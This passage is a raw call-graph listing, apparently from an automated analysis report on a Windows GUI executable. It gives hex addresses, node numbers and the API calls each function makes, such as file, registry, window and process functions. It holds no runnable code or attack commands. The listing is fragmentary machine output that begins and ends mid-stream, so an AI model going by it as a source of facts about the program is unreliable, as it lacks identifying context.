1ffc1b 28 API calls 35869->35897 35870 1ffabd 35899 200872 28 API calls Concurrency::wait 35870->35899 35874 2008d9 35873->35874 35896 20794a 53 API calls 35874->35896 35875 2008eb 35876 200a6b 28 API calls 35875->35876 35877 200933 35876->35877 35878 200a6b 28 API calls 35877->35878 35894 200943 35878->35894 35879 200a28 35880 1e1fed 28 API calls 35879->35880 35881 200a33 35880->35881 35882 1e1fed 28 API calls 35881->35882 35883 200a3e 35882->35883 35884 1e203f Concurrency::wait 28 API calls 35883->35884 35885 200a46 35884->35885 35886 1e203f Concurrency::wait 28 API calls 35885->35886 35887 200a4e 35886->35887 35890 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35887->35890 35888 2014e3 22 API calls 35888->35894 35889 200bb7 28 API calls 35889->35894 35892 200a5b 35890->35892 35891 1e1fbc 28 API calls 35891->35894 35892->35865 35893 2014d0 Concurrency::wait 28 API calls 35893->35894 35894->35879 35894->35888 35894->35889 35894->35891 35894->35893 35895 1e203f Concurrency::wait 28 API calls 35894->35895 35895->35894 35896->35875 35897->35866 35898->35870 35900->35829 35901->35828 35902->35732 35904 1f9daf CreateFileW 35903->35904 35905 1f9d9c CloseHandle 35903->35905 35907 1f9df4 35904->35907 35917 1f9e4d error_info_injector 35904->35917 35905->35904 35908 1f97a0 28 API calls 35907->35908 35910 1f9e23 35908->35910 35909 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35911 1e75b4 35909->35911 35912 1f9e27 CreateFileW 35910->35912 35910->35917 35911->35664 35911->35665 35912->35917 35913 1fa002 35925 1e2330 28 API calls std::_Xinvalid_argument 35913->35925 35915 1f9ffd 35919 21f174 Concurrency::wait 26 API calls 35915->35919 35917->35913 35917->35915 35918 1f9f39 35917->35918 35920 1f9f6d 35917->35920 35924 1f9eca error_info_injector BuildCatchObjectHelperInternal 35917->35924 35921 21b1a7 22 API calls 35918->35921 35919->35913 35922 21b1a7 22 API calls 35920->35922 35923 1f9f57 35920->35923 35921->35923 35922->35923 35923->35915 35923->35924 35924->35909 35926->35744 35928 1e85a8 ___scrt_fastfail 35927->35928 35929 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35928->35929 35930 1e82aa 35929->35930 35930->35701 35945 1e2520 35931->35945 35936 1e258b 28 API calls 35937 1e2519 35936->35937 35938 1ed8b0 35937->35938 35939 21b1a7 22 API calls 35938->35939 35940 1ed8ed 35939->35940 35942 1ed938 FindClose 35940->35942 35944 1ed943 error_info_injector 35940->35944 35941 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35943 1ed975 35941->35943 35942->35944 35943->35767 35944->35941 35946 1e2531 35945->35946 35949 1e2509 35945->35949 35947 1e2538 35946->35947 35946->35949 35950 1e254c 35946->35950 35956 1e2646 28 API calls Concurrency::wait 35947->35956 35952 1e258b 35949->35952 35950->35949 35957 1e2261 28 API calls 3 library calls 35950->35957 35953 1e2599 35952->35953 35954 1e25a8 28 API calls 35953->35954 35955 1e2511 35954->35955 35955->35936 35956->35949 35957->35949 35959 20e879 35958->35959 35963 1fa0b0 7 API calls 35959->35963 35960 20e88b 35961 20e89a 35960->35961 35970 20cb1f 35960->35970 35961->35778 35963->35960 35965 20e8c2 __EH_prolog3_catch 35964->35965 35974 20e3c0 35965->35974 35967 20e8d7 _AnonymousOriginator 35967->35780 35972 20cb3f BuildCatchObjectHelperInternal 35970->35972 35971 20cb53 collate 35971->35961 35972->35971 35973 1fa0b0 7 API calls 35972->35973 35973->35971 36014 20bf87 35974->36014 35976 20e402 35979 20e575 35976->35979 35981 20e47e ___scrt_fastfail 35976->35981 35977 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35978 20e85a 35977->35978 35978->35967 35997 20e565 collate 35979->35997 36013 1fa0b0 7 API calls 35979->36013 35980 20e5ba 35980->35997 36012 1fa0b0 7 API calls 35980->36012 35981->35997 36048 1f6680 28 API calls 35981->36048 35983 20e538 36049 1f5e70 30 API calls 35983->36049 35985 20e733 collate 36017 20c924 35985->36017 35986 20e546 35987 1e23e5 28 API calls 35986->35987 35989 20e553 35987->35989 35990 1e203f Concurrency::wait 28 API calls 35989->35990 35991 20e55c 35990->35991 36050 1eb892 35991->36050 35992 20e750 35994 20e7ca 35992->35994 36021 20d93b 35992->36021 36056 20dc0c 132 API calls Concurrency::wait 35994->36056 35997->35977 35999 20e7ab 35999->35997 36057 1e2261 28 API calls 3 library calls 35999->36057 36002 20e668 ___scrt_fastfail 36002->35985 36054 1f6680 28 API calls 36002->36054 36004 20e703 36055 1f5e70 30 API calls 36004->36055 36006 20e714 36007 1e23e5 28 API calls 36006->36007 36008 20e721 36007->36008 36009 1e203f Concurrency::wait 28 API calls 36008->36009 36010 20e72a 36009->36010 36011 1eb892 28 API calls 36010->36011 36011->35985 36012->36002 36013->35980 36058 20a6a1 36014->36058 36016 20bf8f 36016->35976 36018 20c931 36017->36018 36062 20c900 36018->36062 36066 20d793 36021->36066 36023 20db72 error_info_injector 36132 20f639 28 API calls 2 library calls 36023->36132 36036 21b1a7 22 API calls 36047 20d9dd error_info_injector collate 36036->36047 36047->36023 36047->36036 36072 20f8de 36047->36072 36131 20e9f2 28 API calls Concurrency::wait 36047->36131 36048->35983 36049->35986 36051 1eb89d 36050->36051 36052 1eb8a5 36050->36052 36133 1e2261 28 API calls 3 library calls 36051->36133 36052->35997 36054->36004 36055->36006 36056->35999 36057->35997 36060 20a6ba 36058->36060 36059 20aecf 28 API calls 36059->36060 36060->36059 36061 20a6d8 36060->36061 36061->36016 36063 20c90b 36062->36063 36064 20c9f1 28 API calls 36063->36064 36065 20c91b 36064->36065 36065->35992 36069 20d79a 36066->36069 36067 20d7f1 36067->36047 36068 20d08f 28 API calls 36068->36069 36069->36067 36069->36068 36070 20d174 28 API calls 36069->36070 36071 20d3c7 28 API calls 36069->36071 36070->36069 36071->36069 36073 20c5d9 28 API calls 36072->36073 36074 20f93e 36073->36074 36075 20f942 36074->36075 36076 219582 23 API calls 36074->36076 36077 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36075->36077 36102 20f975 error_info_injector 36076->36102 36078 21040a 36077->36078 36078->36047 36079 20fa96 36081 20f692 28 API calls 36079->36081 36080 21b1a7 22 API calls 36080->36102 36082 20fabf error_info_injector 36081->36082 36083 21b1a7 22 API calls 36082->36083 36115 20fd0b error_info_injector collate 36082->36115 36110 20fb13 error_info_injector 36083->36110 36102->36079 36102->36080 36105 21068e 28 API calls 36102->36105 36105->36102 36109 2100c1 error_info_injector 36110->36109 36112 210478 28 API calls 36112->36115 36113 2104d3 28 API calls 36113->36115 36114 1e2261 28 API calls Concurrency::wait 36114->36115 36115->36109 36115->36112 36115->36113 36115->36114 36117 1e241c 22 API calls 36115->36117 36128 213270 21 API calls 36115->36128 36129 206381 41 API calls 36115->36129 36117->36115 36128->36115 36129->36115 36131->36047 36133->36052 36134->35803 36135->35603 36136->35566 36138 2216a6 _abort 36137->36138 36139 2216bf 36138->36139 36140 2216ad 36138->36140 36161 224d54 EnterCriticalSection 36139->36161 36173 2217f4 GetModuleHandleW 36140->36173 36143 2216b2 36143->36139 36174 221838 GetModuleHandleExW 36143->36174 36148 221781 36165 2217b3 36148->36165 36149 2217ad 36183 22c149 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 36149->36183 36150 2216c6 36157 22173b 36150->36157 36160 221764 36150->36160 36182 2221d0 20 API calls _abort 36150->36182 36154 222449 _abort 5 API calls 36159 221753 36154->36159 36155 222449 _abort 5 API calls 36155->36160 36157->36154 36157->36159 36159->36155 36162 2217a4 36160->36162 36161->36150 36184 224d9c LeaveCriticalSection 36162->36184 36164 22177d 36164->36148 36164->36149 36185 224768 36165->36185 36168 2217e1 36171 221838 _abort 8 API calls 36168->36171 36169 2217c1 GetPEB 36169->36168 36170 2217d1 GetCurrentProcess TerminateProcess 36169->36170 36170->36168 36172 2217e9 ExitProcess 36171->36172 36173->36143 36175 221862 GetProcAddress 36174->36175 36176 221885 36174->36176 36180 221877 36175->36180 36177 221894 36176->36177 36178 22188b FreeLibrary 36176->36178 36179 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36177->36179 36178->36177 36181 2216be 36179->36181 36180->36176 36181->36139 36182->36157 36184->36164 36186 224783 36185->36186 36187 22478d 36185->36187 36189 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36186->36189 36192 224299 5 API calls 2 library calls 36187->36192 36190 2217bd 36189->36190 36190->36168 36190->36169 36191 2247a4 36191->36186 36192->36191 36193 1e1df7 36198 20146a LoadLibraryW 36193->36198 36197 1e1e06 36199 20148c GetProcAddress 36198->36199 36200 1e1dfc 36198->36200 36199->36200 36201 21b473 29 API calls __onexit 36200->36201 36201->36197 36202 1e5633 36210 1e5555 36202->36210 36205 1e565a 36207 1e567a 36205->36207 36301 1e55c8 28 API calls 36205->36301 36211 1e556a 36210->36211 36212 1e5581 36211->36212 36302 1e5c66 28 API calls 36211->36302 36212->36205 36214 1eab81 GetDlgItem 36212->36214 36218 1eac1f 36212->36218 36215 1eabe4 36214->36215 36216 1eab99 __aulldiv 36214->36216 36215->36205 36216->36215 36217 1eabd7 PostMessageW 36216->36217 36217->36215 36219 1eae5d 36218->36219 36220 1eac55 36218->36220 36223 1eae69 36219->36223 36224 1eb035 36219->36224 36221 1eac5b 36220->36221 36222 1ead92 36220->36222 36228 1eacbe 36221->36228 36230 1ead7f 36221->36230 36231 1eac7f 36221->36231 36225 1e3449 31 API calls 36222->36225 36229 1eae75 36223->36229 36244 1eafed 36223->36244 36465 1ea5dd 29 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 36224->36465 36227 1eadb6 36225->36227 36232 1faa54 31 API calls 36227->36232 36233 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36228->36233 36229->36228 36234 1eae8d 36229->36234 36235 1eafd2 36229->36235 36303 1e9357 36230->36303 36364 1e9e02 36230->36364 36236 1eacfe 36231->36236 36237 1eac88 36231->36237 36239 1eadbd 36232->36239 36240 1eb054 36233->36240 36234->36228 36246 1eaeb7 IsWindow 36234->36246 36415 1e9820 36235->36415 36245 1ead69 36236->36245 36248 1ead0e 36236->36248 36241 1eacdb GetDlgItem 36237->36241 36242 1eac90 36237->36242 36243 1e25a8 28 API calls 36239->36243 36240->36205 36241->36228 36242->36228 36259 1eab81 2 API calls 36242->36259 36247 1eadd9 36243->36247 36244->36228 36462 1e551e 29 API calls 36244->36462 36245->36228 36249 1ead71 KiUserCallbackDispatcher 36245->36249 36246->36228 36252 1eaec8 36246->36252 36253 1e203f Concurrency::wait 28 API calls 36247->36253 36250 1ead18 36248->36250 36251 1ead33 36248->36251 36249->36228 36458 1eab40 71 API calls 36250->36458 36257 1ead4f 36251->36257 36258 1ead3d PostMessageW 36251->36258 36256 1eaef4 36252->36256 36264 1eaee8 36252->36264 36260 1eade2 36253->36260 36460 1eb05a 34 API calls 2 library calls 36256->36460 36257->36228 36459 1e9a2e 39 API calls 4 library calls 36257->36459 36258->36228 36259->36228 36270 1e25a8 28 API calls 36260->36270 36261 1eb008 36262 1eb02a 36261->36262 36463 1eb791 12 API calls 36261->36463 36464 1e8ae1 DestroyIcon 36262->36464 36263 1ead1f 36263->36228 36273 1e9e02 239 API calls 36263->36273 36267 1e1f8e 28 API calls 36264->36267 36278 1eaef2 _wcslen 36267->36278 36268 1eaeff 36274 1e23e5 28 API calls 36268->36274 36271 1eadf9 _wcslen 36270->36271 36277 1e25a8 28 API calls 36271->36277 36273->36228 36275 1eaf09 36274->36275 36276 1e203f Concurrency::wait 28 API calls 36275->36276 36279 1eaf12 36276->36279 36280 1eae10 GetDlgItem 36277->36280 36281 1e25a8 28 API calls 36278->36281 36279->36278 36285 1e3449 31 API calls 36279->36285 36282 1eae4f 36280->36282 36283 1eae24 SendMessageW PostMessageW 36280->36283 36284 1eaf5e GetDlgItem 36281->36284 36287 1e203f Concurrency::wait 28 API calls 36282->36287 36283->36282 36288 1eafaa 36284->36288 36289 1eaf72 IsWindow 36284->36289 36286 1eaf29 36285->36286 36290 1faa54 31 API calls 36286->36290 36287->36228 36292 1eafba 36288->36292 36461 1eb791 12 API calls 36288->36461 36289->36288 36291 1eaf7d SendMessageW PostMessageW 36289->36291 36294 1eaf30 36290->36294 36291->36288 36293 1e203f Concurrency::wait 28 API calls 36292->36293 36293->36228 36296 1e23e5 28 API calls 36294->36296 36297 1eaf3e 36296->36297 36298 1e203f Concurrency::wait 28 API calls 36297->36298 36298->36278 36301->36207 36302->36212 36305 1e937e 36303->36305 36304 1e93bf 36306 1e93f7 36304->36306 36309 1e3449 31 API calls 36304->36309 36305->36304 36307 1e3449 31 API calls 36305->36307 36308 1e241c 22 API calls 36306->36308 36310 1e939f 36307->36310 36311 1e9407 36308->36311 36312 1e93d7 36309->36312 36313 1faa54 31 API calls 36310->36313 36466 1ec180 36311->36466 36315 1faa54 31 API calls 36312->36315 36316 1e93a6 36313->36316 36318 1e93de 36315->36318 36319 1e23e5 28 API calls 36316->36319 36317 1e9415 36322 1e3449 31 API calls 36317->36322 36329 1e9450 36317->36329 36320 1e23e5 28 API calls 36318->36320 36321 1e93b6 36319->36321 36323 1e93ee 36320->36323 36326 1e203f Concurrency::wait 28 API calls 36321->36326 36327 1e9434 36322->36327 36325 1e203f Concurrency::wait 28 API calls 36323->36325 36324 1e9497 36330 1e949e LoadIconW 36324->36330 36325->36306 36326->36304 36328 1faa54 31 API calls 36327->36328 36331 1e943b 36328->36331 36329->36324 36332 1e947e MessageBoxW 36329->36332 36333 1e94bb 36330->36333 36334 1e94ab SendMessageW 36330->36334 36335 1e23e5 28 API calls 36331->36335 36332->36324 36336 1e9490 36332->36336 36337 1e94c6 36333->36337 36338 1e94d0 ShowWindow 36333->36338 36334->36333 36339 1e9447 36335->36339 36344 1e203f Concurrency::wait 28 API calls 36336->36344 36341 1e5472 9 API calls 36337->36341 36340 1e94ce 36338->36340 36342 1e203f Concurrency::wait 28 API calls 36339->36342 36471 1e9f25 36340->36471 36341->36340 36342->36329 36346 1e957f 36344->36346 36348 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36346->36348 36347 1e951f 36351 1e9560 36347->36351 36563 1e336e 36347->36563 36350 1e958f 36348->36350 36349 21b1a7 22 API calls 36352 1e94f1 36349->36352 36350->36245 36357 1e9e02 239 API calls 36351->36357 36561 1e4bbe 28 API calls 2 library calls 36352->36561 36356 1e94f9 36562 1f3900 63 API calls 36356->36562 36357->36336 36358 1e23e5 28 API calls 36360 1e9557 36358->36360 36362 1e203f Concurrency::wait 28 API calls 36360->36362 36361 1e9506 36361->36347 36363 1e1f8e 28 API calls 36361->36363 36362->36351 36363->36347 36365 1e9e0e 36364->36365 36366 1e9e1b 36364->36366 36365->36366 36368 1e9b6d 58 API calls 36365->36368 36619 1e9b6d 36366->36619 36368->36366 36370 1e9e34 36372 1e9e5a SetWindowTextW GetDlgItem 36370->36372 36373 1e9e39 36370->36373 36371 1e9ee3 SetWindowTextW GetDlgItem 36376 1e9f0f SetWindowTextW 36371->36376 36377 1e9f21 36371->36377 36379 1e9e9a 36372->36379 36380 1e9e88 SetWindowTextW 36372->36380 36373->36377 36659 1e9593 36373->36659 36376->36377 36377->36245 36383 1e9f25 80 API calls 36379->36383 36380->36379 36385 1e9ea3 GetDlgItem 36383->36385 36387 1e9ec3 GetDlgItem 36385->36387 36388 1e9eb1 SetWindowTextW 36385->36388 36387->36377 36390 1e9ed1 SendMessageW 36387->36390 36388->36387 36390->36377 36392 1e336e 30 API calls 36393 1ea4d5 36392->36393 36394 1e23e5 28 API calls 36393->36394 36395 1ea4dd 36394->36395 36396 1e203f Concurrency::wait 28 API calls 36395->36396 36397 1ea4e5 GetDlgItem 36396->36397 36398 1ea4f9 36397->36398 36399 1ea513 36397->36399 36398->36399 36400 1ea501 SetWindowTextW 36398->36400 36401 1e1f8e 28 API calls 36399->36401 36400->36399 36402 1ea535 36401->36402 36403 21b1a7 22 API calls 36402->36403 36404 1ea58a 36403->36404 36721 1f5a70 36404->36721 36407 1e84a6 2 API calls 36408 1ea5a6 36407->36408 36726 1f5c10 36408->36726 36411 1ea5ce 36413 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36411->36413 36412 1ea5b6 SetTimer 36412->36411 36414 1ea5db 36413->36414 36414->36245 36416 1e983e 36415->36416 36417 1e3449 31 API calls 36416->36417 36418 1e9853 36417->36418 36419 1faa54 31 API calls 36418->36419 36420 1e985a SetWindowTextW 36419->36420 36421 1e9879 36420->36421 36429 1e9884 36420->36429 37587 1e4c00 88 API calls 4 library calls 36421->37587 36423 1e996e 36424 1e999a GetDlgItem 36423->36424 36425 1e9977 36423->36425 36427 1e99ae IsWindow 36424->36427 36428 1e99c8 GetDlgItem 36424->36428 36426 1e9987 PostMessageW 36425->36426 37513 1eb123 36425->37513 36431 1e9a17 36426->36431 36427->36428 36432 1e99b9 PostMessageW 36427->36432 36428->36431 36433 1e99dc IsWindow 36428->36433 36429->36423 37501 1e6ca8 36429->37501 36437 1e203f Concurrency::wait 28 API calls 36431->36437 36432->36428 36433->36431 36435 1e99e7 36433->36435 36438 1e3449 31 API calls 36435->36438 36441 1e9a1f 36437->36441 36442 1e99f5 36438->36442 36439 1e9955 36448 1e1fed 28 API calls 36439->36448 36440 1e98cb GetDlgItem 36451 1e98db _wcslen 36440->36451 36443 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36441->36443 36444 1faa54 31 API calls 36442->36444 36446 1e9a2c 36443->36446 36447 1e99fc SetWindowTextW 36444->36447 36445 1e241c 22 API calls 36445->36451 36446->36228 36449 1e203f Concurrency::wait 28 API calls 36447->36449 36448->36423 36449->36431 36450 1e25a8 28 API calls 36450->36451 36451->36445 36451->36450 36452 1e9901 IsWindow 36451->36452 36454 1e203f Concurrency::wait 28 API calls 36451->36454 36455 1e9936 36451->36455 36452->36451 36453 1e990c SendMessageW 36452->36453 36453->36451 36454->36451 36455->36439 36456 1e993a IsWindow 36455->36456 36456->36439 36457 1e9945 PostMessageW 36456->36457 36457->36439 36458->36263 36459->36228 36460->36268 36461->36292 36462->36261 36463->36262 36465->36228 36467 1ec1ca BuildCatchObjectHelperInternal 36466->36467 36469 1ec195 _wcschr 36466->36469 36467->36317 36469->36467 36582 1e3196 28 API calls 36469->36582 36472 1e9f65 36471->36472 36473 1e9fcf 36472->36473 36474 1e9f7d 36472->36474 36475 1ea00d GetCurrentDirectoryW 36473->36475 36476 1e9fd9 36473->36476 36477 1e336e 30 API calls 36474->36477 36479 1ea024 36475->36479 36480 1ea050 36475->36480 36606 1e3366 56 API calls 36476->36606 36478 1e9f8b 36477->36478 36482 1e23e5 28 API calls 36478->36482 36479->36480 36483 1ea028 _wcslen 36479->36483 36484 1f1f00 32 API calls 36480->36484 36486 1e9f97 36482->36486 36493 1e206a 28 API calls 36483->36493 36487 1ea05b 36484->36487 36485 1e9fe7 36607 1ec210 36485->36607 36489 1e203f Concurrency::wait 28 API calls 36486->36489 36612 1edd80 31 API calls 2 library calls 36487->36612 36492 1e9fa2 36489->36492 36491 1e9ff7 _wcslen 36498 1e25a8 28 API calls 36491->36498 36496 1ea124 36492->36496 36499 1f1f00 32 API calls 36492->36499 36497 1ea00b 36493->36497 36494 1ea06c 36495 1e203f Concurrency::wait 28 API calls 36494->36495 36495->36497 36501 1e1f8e 28 API calls 36496->36501 36497->36496 36502 1e241c 22 API calls 36497->36502 36498->36497 36500 1e9fb9 36499->36500 36605 1edd80 31 API calls 2 library calls 36500->36605 36510 1ea141 36501->36510 36504 1ea08f 36502->36504 36506 1ec180 28 API calls 36504->36506 36505 1e9fca 36507 1e203f Concurrency::wait 28 API calls 36505->36507 36508 1ea0a1 36506->36508 36507->36496 36511 1ec210 28 API calls 36508->36511 36509 1e336e 30 API calls 36512 1ea32e 36509->36512 36539 1ea30d 36510->36539 36583 1e51c0 LoadLibraryW 36510->36583 36513 1ea0b1 _wcslen 36511->36513 36514 1e23e5 28 API calls 36512->36514 36522 1e25a8 28 API calls 36513->36522 36517 1ea336 36514->36517 36518 1e203f Concurrency::wait 28 API calls 36517->36518 36520 1ea341 36518->36520 36519 1e1fbc 28 API calls 36521 1ea189 36519->36521 36523 1e203f Concurrency::wait 28 API calls 36520->36523 36587 1e5274 36521->36587 36525 1ea0cd 36522->36525 36526 1ea34c 36523->36526 36528 1e25a8 28 API calls 36525->36528 36529 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36526->36529 36531 1ea0f3 36528->36531 36532 1e94e2 36529->36532 36530 1e203f Concurrency::wait 28 API calls 36533 1ea1a9 36530->36533 36534 1ec210 28 API calls 36531->36534 36532->36347 36532->36349 36536 1ea302 36533->36536 36538 1e1f8e 28 API calls 36533->36538 36535 1ea100 _wcslen 36534->36535 36541 1e25a8 28 API calls 36535->36541 36614 1e5264 36536->36614 36540 1ea1e9 36538->36540 36539->36509 36591 1ec2d0 36540->36591 36541->36505 36543 1ea1f4 36544 1e1fbc 28 API calls 36543->36544 36545 1ea223 36544->36545 36595 1e52c9 36545->36595 36548 1ea262 36550 1e203f Concurrency::wait 28 API calls 36548->36550 36551 1ea278 36550->36551 36552 1ea2ec 36551->36552 36553 1ea27c GetDlgItem 36551->36553 36554 1e203f Concurrency::wait 28 API calls 36552->36554 36555 1ea2da 36553->36555 36556 1ea290 36553->36556 36558 1ea2f7 36554->36558 36557 1e1f8e 28 API calls 36555->36557 36556->36555 36559 1ea296 SendMessageW SendMessageW 36556->36559 36557->36552 36560 1e203f Concurrency::wait 28 API calls 36558->36560 36559->36555 36560->36536 36561->36356 36562->36361 36564 1e338f 36563->36564 36565 1e3395 36564->36565 36566 1e33a1 36564->36566 36567 1e241c 22 API calls 36565->36567 36568 1e241c 22 API calls 36566->36568 36569 1e339c 36567->36569 36570 1e33a9 ExpandEnvironmentStringsW 36568->36570 36572 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36569->36572 36573 1e33c5 36570->36573 36576 1e33cf 36570->36576 36575 1e3447 36572->36575 36574 1e241c 22 API calls 36573->36574 36580 1e33cd collate 36574->36580 36575->36358 36577 1e33f1 ExpandEnvironmentStringsW 36576->36577 36579 1e3402 _wcslen 36577->36579 36577->36580 36578 1e203f Concurrency::wait 28 API calls 36578->36569 36579->36580 36581 1e206a 28 API calls 36579->36581 36580->36578 36581->36580 36584 1e525f 36583->36584 36585 1e51ec 6 API calls 36583->36585 36584->36519 36585->36584 36586 1e5243 36585->36586 36586->36584 36588 1e5281 RegCreateKeyExW 36587->36588 36590 1e52b4 36587->36590 36588->36590 36590->36530 36592 1ec2de 36591->36592 36593 1ec30d 36591->36593 36592->36593 36617 21f310 40 API calls 36592->36617 36593->36543 36596 1e52f4 RegCreateKeyExW 36595->36596 36602 1e539d 36595->36602 36600 1e5329 ___scrt_fastfail 36596->36600 36596->36602 36598 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36599 1e53c5 36598->36599 36599->36548 36613 1ebfd0 40 API calls 36599->36613 36601 1e535a RegQueryValueExW 36600->36601 36600->36602 36601->36602 36603 1e5381 _wcslen 36601->36603 36602->36598 36604 1e206a 28 API calls 36603->36604 36604->36602 36605->36505 36606->36485 36608 1ec22e _wcschr 36607->36608 36611 1ec286 BuildCatchObjectHelperInternal 36607->36611 36608->36611 36618 1e3196 28 API calls 36608->36618 36611->36491 36612->36494 36613->36548 36615 1e526a FreeLibrary 36614->36615 36616 1e5273 36614->36616 36615->36616 36616->36539 36617->36592 36620 1e9d75 36619->36620 36621 1e9bc1 36619->36621 36624 1e9d77 GetDlgItem 36620->36624 36632 1e9d96 GetDlgItem 36620->36632 36622 1e9bca 36621->36622 36623 1e9ca5 36621->36623 36625 1e9d73 36622->36625 36626 1e9bd3 GetDlgItem 36622->36626 36627 1e9ca7 GetDlgItem 36623->36627 36636 1e9cf6 GetDlgItem 36623->36636 36638 1e3449 31 API calls 36623->36638 36646 1faa54 31 API calls 36623->36646 36624->36620 36628 1e9d88 ShowWindow 36624->36628 36629 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36625->36629 36630 1e9be6 36626->36630 36631 1e9c22 GetDlgItem 36626->36631 36627->36623 36628->36620 36635 1e9e00 36629->36635 36637 1e3449 31 API calls 36630->36637 36633 1e9c33 36631->36633 36634 1e9c70 GetDlgItem 36631->36634 36632->36625 36639 1e9daa GetWindowRect ScreenToClient SetWindowPos 36632->36639 36640 1e3449 31 API calls 36633->36640 36643 1e9c7e KiUserCallbackDispatcher 36634->36643 36644 1e9c86 GetDlgItem 36634->36644 36635->36370 36635->36371 36641 1e9d0a GetWindowRect ScreenToClient SetWindowPos 36636->36641 36642 1e9d53 GetDlgItem 36636->36642 36645 1e9bf4 36637->36645 36638->36623 36639->36625 36647 1e9c41 36640->36647 36641->36642 36648 1e9d6d 36642->36648 36649 1e9d64 ShowWindow 36642->36649 36643->36644 36644->36625 36650 1e9c98 EnableWindow 36644->36650 36651 1faa54 31 API calls 36645->36651 36652 1e9cd1 SetWindowTextW 36646->36652 36653 1faa54 31 API calls 36647->36653 36648->36625 36648->36642 36649->36648 36650->36625 36654 1e9bfb SetWindowTextW KiUserCallbackDispatcher 36651->36654 36655 1e203f Concurrency::wait 28 API calls 36652->36655 36656 1e9c48 SetWindowTextW EnableWindow 36653->36656 36657 1e203f Concurrency::wait 28 API calls 36654->36657 36655->36623 36658 1e203f Concurrency::wait 28 API calls 36656->36658 36657->36631 36658->36634 36660 1e3449 31 API calls 36659->36660 36661 1e95bc 36660->36661 36662 1faa54 31 API calls 36661->36662 36663 1e95c3 SetWindowTextW 36662->36663 36664 21cc90 ___scrt_fastfail 36663->36664 36665 1e95f4 GetDlgItem 36664->36665 36666 1e9657 IsWindow 36665->36666 36667 1e9611 IsWindow 36665->36667 36669 1e965e SetWindowTextW 36666->36669 36670 1e9655 36666->36670 36667->36666 36668 1e9618 GetWindowTextW 36667->36668 36668->36666 36671 1e962f _wcslen 36668->36671 36669->36670 36673 1e336e 30 API calls 36670->36673 36676 1e206a 28 API calls 36671->36676 36674 1e968a 36673->36674 36675 1e23e5 28 API calls 36674->36675 36677 1e9692 36675->36677 36676->36670 36678 1e203f Concurrency::wait 28 API calls 36677->36678 36679 1e969d 36678->36679 36680 1ec210 28 API calls 36679->36680 36681 1e96a9 36680->36681 36682 1e9797 36681->36682 36743 1ebfd0 40 API calls 36681->36743 36683 1e203f Concurrency::wait 28 API calls 36682->36683 36684 1e97a2 36683->36684 36686 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36684->36686 36688 1e97af 36686->36688 36687 1e96ca 36687->36682 36689 1e51c0 7 API calls 36687->36689 36708 1e97b1 36688->36708 36690 1e96dd 36689->36690 36691 1e241c 22 API calls 36690->36691 36692 1e96ef 36691->36692 36693 1ec2d0 40 API calls 36692->36693 36694 1e96fa 36693->36694 36695 1e1fbc 28 API calls 36694->36695 36696 1e972b 36695->36696 36697 1e5274 RegCreateKeyExW 36696->36697 36698 1e973e 36697->36698 36699 1e203f Concurrency::wait 28 API calls 36698->36699 36700 1e974b 36699->36700 36701 1e9781 36700->36701 36703 1e1fbc 28 API calls 36700->36703 36702 1e203f Concurrency::wait 28 API calls 36701->36702 36704 1e978c 36702->36704 36705 1e975b 36703->36705 36706 1e5264 FreeLibrary 36704->36706 36707 1e203f Concurrency::wait 28 API calls 36705->36707 36706->36682 36707->36701 36709 1e336e 30 API calls 36708->36709 36710 1e97d5 36709->36710 36711 1e23e5 28 API calls 36710->36711 36712 1e97dd 36711->36712 36713 1e203f Concurrency::wait 28 API calls 36712->36713 36714 1e97e5 36713->36714 36715 1e97f5 36714->36715 36752 1ea35d 154 API calls 2 library calls 36714->36752 36744 1e6c50 36715->36744 36718 1e980a 36719 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36718->36719 36720 1e981e 36719->36720 36720->36392 36722 21b1a7 22 API calls 36721->36722 36723 1f5abc 36722->36723 37023 1f5600 36723->37023 36725 1ea598 36725->36407 36727 1f5c4b 36726->36727 36728 1f5c44 36726->36728 36729 1f5c67 36727->36729 36730 1f5c60 EnterCriticalSection 36727->36730 36732 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 36728->36732 36731 1f5c77 InterlockedExchangeAdd 36729->36731 36735 1f5ccb 36729->36735 36730->36729 37331 22093b 36731->37331 36734 1ea5ad 36732->36734 36734->36411 36734->36412 36735->36728 36737 1f5cde LeaveCriticalSection 36735->36737 36737->36728 36738 1f5cad 37345 1f5a30 CloseHandle CloseHandle 36738->37345 36739 1f5d18 ResetEvent 36740 1f5d22 ResumeThread 36739->36740 36740->36735 36740->36738 36743->36687 36745 1e6c8b 36744->36745 36746 1e6c65 36744->36746 36748 1e6c9f 36745->36748 36798 1e678f 58 API calls 2 library calls 36745->36798 36753 1e6100 36746->36753 36748->36718 36751 1e1fed 28 API calls 36751->36745 36752->36715 36754 21cc90 ___scrt_fastfail 36753->36754 36755 1e6148 GetCurrentDirectoryW 36754->36755 36756 1e6161 36755->36756 36799 1f3310 36756->36799 36758 1e6773 36759 1e1fed 28 API calls 36758->36759 